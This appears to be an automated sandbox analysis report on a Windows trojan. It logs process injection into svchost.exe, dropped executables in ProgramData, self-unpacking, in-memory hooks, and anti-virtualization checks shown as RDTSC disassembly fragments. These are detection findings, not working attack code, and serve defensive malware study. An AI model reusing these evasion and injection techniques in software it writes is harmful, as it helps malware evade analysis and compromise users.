Source: C:\Users\user\Desktop\GziaFibS0d.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_025339E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	3_2_025339E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_026939E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	5_2_026939E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E39E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	15_2_027E39E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC39E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	17_2_02EC39E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC39E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	19_2_02AC39E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F739E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	21_2_02F739E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_028939E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	23_2_028939E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B139E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	26_2_02B139E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A539E8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	28_2_02A539E8

Source: classification engine

Classification label: mal100.troj.evad.winEXE@27/8@0/0

Source: GziaFibS0d.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\Center\war\Soil\we\Summer\Wrong\Black\checkwork.pdb source: GziaFibS0d.exe, tsuvgo.exe.5.dr, uvtsuvts.exe.23.dr, czipqtsh.exe.26.dr, ayxuiczvtsui.exe.19.dr, rencz.exe.3.dr, ziczv.exe.21.dr, tfykdkdkdk.exe.17.dr, zipdk.exe.15.dr
Source:	Binary string: ntdll.pdb source: GziaFibS0d.exe, 00000000.00000003.1022750476.000000000261E000.00000004.00000020.00020000.00000000.sdmp, rencz.exe, 00000004.00000003.1250604560.0000000002529000.00000004.00000020.00020000.00000000.sdmp, tsuvgo.exe, 00000006.00000003.1477569101.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, zipdk.exe, 00000010.00000003.1723834095.0000000002523000.00000004.00000020.00020000.00000000.sdmp, tfykdkdkdk.exe, 00000012.00000003.1951593792.0000000002528000.00000004.00000020.00020000.00000000.sdmp, ayxuiczvtsui.exe, 00000014.00000003.2217344590.0000000002764000.00000004.00000020.00020000.00000000.sdmp, ziczv.exe, 00000016.00000003.2450334827.0000000002502000.00000004.00000020.00020000.00000000.sdmp, uvtsuvts.exe, 00000018.00000003.2700926847.00000000025FC000.00000004.00000020.00020000.00000000.sdmp, czipqtsh.exe, 0000001B.00000003.2949868036.0000000002626000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: GziaFibS0d.exe, 00000000.00000003.1022750476.000000000261E000.00000004.00000020.00020000.00000000.sdmp, rencz.exe, 00000004.00000003.1250604560.0000000002529000.00000004.00000020.00020000.00000000.sdmp, tsuvgo.exe, 00000006.00000003.1477569101.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, zipdk.exe, 00000010.00000003.1723834095.0000000002523000.00000004.00000020.00020000.00000000.sdmp, tfykdkdkdk.exe, 00000012.00000003.1951593792.0000000002528000.00000004.00000020.00020000.00000000.sdmp, ayxuiczvtsui.exe, 00000014.00000003.2217344590.0000000002764000.00000004.00000020.00020000.00000000.sdmp, ziczv.exe, 00000016.00000003.2450334827.0000000002502000.00000004.00000020.00020000.00000000.sdmp, uvtsuvts.exe, 00000018.00000003.2700926847.00000000025FC000.00000004.00000020.00020000.00000000.sdmp, czipqtsh.exe, 0000001B.00000003.2949868036.0000000002626000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Unpacked PE file: 0.2.GziaFibS0d.exe.400000.0.unpack
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Unpacked PE file: 4.2.rencz.exe.400000.0.unpack
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Unpacked PE file: 6.2.tsuvgo.exe.400000.0.unpack
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Unpacked PE file: 16.2.zipdk.exe.400000.0.unpack
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Unpacked PE file: 18.2.tfykdkdkdk.exe.400000.0.unpack
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Unpacked PE file: 20.2.ayxuiczvtsui.exe.400000.0.unpack
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Unpacked PE file: 22.2.ziczv.exe.400000.0.unpack
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Unpacked PE file: 24.2.uvtsuvts.exe.400000.0.unpack
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Unpacked PE file: 27.2.czipqtsh.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Unpacked PE file: 0.2.GziaFibS0d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Unpacked PE file: 4.2.rencz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Unpacked PE file: 6.2.tsuvgo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Unpacked PE file: 16.2.zipdk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Unpacked PE file: 18.2.tfykdkdkdk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Unpacked PE file: 20.2.ayxuiczvtsui.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Unpacked PE file: 22.2.ziczv.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Unpacked PE file: 24.2.uvtsuvts.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Unpacked PE file: 27.2.czipqtsh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;bss:W;.rdata:R;.data:W;

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00404F5B push esi; ret	0_2_00404FB6
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040715C push eax; ret	0_2_0040724C
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407167 push eax; ret	0_2_0040724C
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407109 push eax; ret	0_2_0040724C
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040810A push ebp; ret	0_2_0040810B
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407713 push es; ret	0_2_00407714
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00408221 push ebx; iretd	0_2_00408224
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00405C37 push eax; iretd	0_2_00405C38
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004071D3 push eax; ret	0_2_0040724C
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407281 push eax; ret	0_2_0040724C
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004071BF push eax; ret	0_2_0040724C
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040A467 push ebp; retf	0_2_0040A469
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040BD12 push 03006966h; retf	0_2_0040BD17
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040FDD8 push esi; ret	0_2_0040FE08
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040C9EB push esi; retf	0_2_0040CA56
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040ADEE push esp; ret	0_2_0040AE1F
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040BADD push edx; iretd	0_2_0040BAF6
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040C358 pushad ; retf	0_2_0040C35B
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040BB37 push edx; iretd	0_2_0040BAF6
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040B7C7 push ss; ret	0_2_0040B7C8
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00404F5B push esi; ret	4_2_00404FB6
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_0040715C push eax; ret	4_2_0040724C
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407167 push eax; ret	4_2_0040724C
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407109 push eax; ret	4_2_0040724C
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_0040810A push ebp; ret	4_2_0040810B
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407713 push es; ret	4_2_00407714
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00408221 push ebx; iretd	4_2_00408224
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00405C37 push eax; iretd	4_2_00405C38
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_004071D3 push eax; ret	4_2_0040724C
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407281 push eax; ret	4_2_0040724C
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_004071BF push eax; ret	4_2_0040724C

Source: C:\Users\user\Desktop\GziaFibS0d.exe

Code function: 0_2_00401AC0 LoadLibraryA,GetProcAddress,

0_2_00401AC0

Source: initial sample	Static PE information: section name: .text entropy: 6.863283110833074
Source: initial sample	Static PE information: section name: .text entropy: 6.8653759157560055
Source: initial sample	Static PE information: section name: .text entropy: 6.866276785954383
Source: initial sample	Static PE information: section name: .text entropy: 6.86671541855013
Source: initial sample	Static PE information: section name: .text entropy: 6.866969584595286
Source: initial sample	Static PE information: section name: .text entropy: 6.86714196430605
Source: initial sample	Static PE information: section name: .text entropy: 6.867205984763689
Source: initial sample	Static PE information: section name: .text entropy: 6.867205984763689
Source: initial sample	Static PE information: section name: .text entropy: 6.867205984763689

Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Memory written: PID: 6232 base: 7703D5D0 value: E9 D9 53 4F 8B	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Memory written: PID: 6860 base: 7703D5D0 value: E9 D9 53 65 8B	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Memory written: PID: 5944 base: 7703D5D0 value: E9 D9 53 7A 8B	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Memory written: PID: 6344 base: 7703D5D0 value: E9 D9 53 E8 8B	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Memory written: PID: 3320 base: 7703D5D0 value: E9 D9 53 A8 8B	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Memory written: PID: 5876 base: 7703D5D0 value: E9 D9 53 F3 8B	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Memory written: PID: 5056 base: 7703D5D0 value: E9 D9 53 85 8B	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Memory written: PID: 3712 base: 7703D5D0 value: E9 D9 53 AD 8B	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Memory written: PID: 6728 base: 7703D5D0 value: E9 D9 53 A1 8B	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002533ABA second address: 0000000002533AEC instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 imul ecx, ecx, 28h 0x00000007 div dword ptr [esp+18h] 0x0000000b mov eax, dword ptr [ecx+edi+0000010Ch] 0x00000012 add eax, ebp 0x00000014 mov dword ptr [esp+10h], edx 0x00000018 add eax, ebx 0x0000001a mov dword ptr [esp+18h], eax 0x0000001e lea eax, dword ptr [edx+ebp] 0x00000021 mov dword ptr [ecx+edi+00000100h], eax 0x00000028 test edx, edx 0x0000002a je 00007F715CFD59F2h 0x0000002c mov ecx, dword ptr [esp+18h] 0x00000030 mov edi, edx 0x00000032 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002533AEC second address: 0000000002533AEC instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [esi+ecx], al 0x00000005 inc esi 0x00000006 cmp esi, edi 0x00000008 jc 00007F715CEEE5D8h 0x0000000a rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002693ABA second address: 0000000002693AEC instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 imul ecx, ecx, 28h 0x00000007 div dword ptr [esp+18h] 0x0000000b mov eax, dword ptr [ecx+edi+0000010Ch] 0x00000012 add eax, ebp 0x00000014 mov dword ptr [esp+10h], edx 0x00000018 add eax, ebx 0x0000001a mov dword ptr [esp+18h], eax 0x0000001e lea eax, dword ptr [edx+ebp] 0x00000021 mov dword ptr [ecx+edi+00000100h], eax 0x00000028 test edx, edx 0x0000002a je 00007F715CFD59F2h 0x0000002c mov ecx, dword ptr [esp+18h] 0x00000030 mov edi, edx 0x00000032 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002693AEC second address: 0000000002693AEC instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [esi+ecx], al 0x00000005 inc esi 0x00000006 cmp esi, edi 0x00000008 jc 00007F715CEEE5D8h 0x0000000a rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000027E3ABA second address: 00000000027E3AEC instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 imul ecx, ecx, 28h 0x00000007 div dword ptr [esp+18h] 0x0000000b mov eax, dword ptr [ecx+edi+0000010Ch] 0x00000012 add eax, ebp 0x00000014 mov dword ptr [esp+10h], edx 0x00000018 add eax, ebx 0x0000001a mov dword ptr [esp+18h], eax 0x0000001e lea eax, dword ptr [edx+ebp] 0x00000021 mov dword ptr [ecx+edi+00000100h], eax 0x00000028 test edx, edx 0x0000002a je 00007F715CFD59F2h 0x0000002c mov ecx, dword ptr [esp+18h] 0x00000030 mov edi, edx 0x00000032 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000027E3AEC second address: 00000000027E3AEC instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [esi+ecx], al 0x00000005 inc esi 0x00000006 cmp esi, edi 0x00000008 jc 00007F715CEEE5D8h 0x0000000a rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002EC3ABA second address: 0000000002EC3AEC instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 imul ecx, ecx, 28h 0x00000007 div dword ptr [esp+18h] 0x0000000b mov eax, dword ptr [ecx+edi+0000010Ch] 0x00000012 add eax, ebp 0x00000014 mov dword ptr [esp+10h], edx 0x00000018 add eax, ebx 0x0000001a mov dword ptr [esp+18h], eax 0x0000001e lea eax, dword ptr [edx+ebp] 0x00000021 mov dword ptr [ecx+edi+00000100h], eax 0x00000028 test edx, edx 0x0000002a je 00007F715CFD59F2h 0x0000002c mov ecx, dword ptr [esp+18h] 0x00000030 mov edi, edx 0x00000032 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002EC3AEC second address: 0000000002EC3AEC instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [esi+ecx], al 0x00000005 inc esi 0x00000006 cmp esi, edi 0x00000008 jc 00007F715CEEE5D8h 0x0000000a rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002AC3ABA second address: 0000000002AC3AEC instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 imul ecx, ecx, 28h 0x00000007 div dword ptr [esp+18h] 0x0000000b mov eax, dword ptr [ecx+edi+0000010Ch] 0x00000012 add eax, ebp 0x00000014 mov dword ptr [esp+10h], edx 0x00000018 add eax, ebx 0x0000001a mov dword ptr [esp+18h], eax 0x0000001e lea eax, dword ptr [edx+ebp] 0x00000021 mov dword ptr [ecx+edi+00000100h], eax 0x00000028 test edx, edx 0x0000002a je 00007F715CFD59F2h 0x0000002c mov ecx, dword ptr [esp+18h] 0x00000030 mov edi, edx 0x00000032 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002AC3AEC second address: 0000000002AC3AEC instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [esi+ecx], al 0x00000005 inc esi 0x00000006 cmp esi, edi 0x00000008 jc 00007F715CEEE5D8h 0x0000000a rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002F73ABA second address: 0000000002F73AEC instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 imul ecx, ecx, 28h 0x00000007 div dword ptr [esp+18h] 0x0000000b mov eax, dword ptr [ecx+edi+0000010Ch] 0x00000012 add eax, ebp 0x00000014 mov dword ptr [esp+10h], edx 0x00000018 add eax, ebx 0x0000001a mov dword ptr [esp+18h], eax 0x0000001e lea eax, dword ptr [edx+ebp] 0x00000021 mov dword ptr [ecx+edi+00000100h], eax 0x00000028 test edx, edx 0x0000002a je 00007F715CFD59F2h 0x0000002c mov ecx, dword ptr [esp+18h] 0x00000030 mov edi, edx 0x00000032 rdtsc

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	0_2_00401264
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	4_2_00401264
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	6_2_00401264
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	16_2_00401264
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	18_2_00401264
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	20_2_00401264
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	22_2_00401264
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	24_2_00401264
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: StrStrIA,StrToIntA,GetModuleFileNameW,	27_2_00401264

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0253205E	3_2_0253205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0269205E	5_2_0269205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E205E	15_2_027E205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC205E	17_2_02EC205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC205E	19_2_02AC205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F7205E	21_2_02F7205E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_0289205E	23_2_0289205E
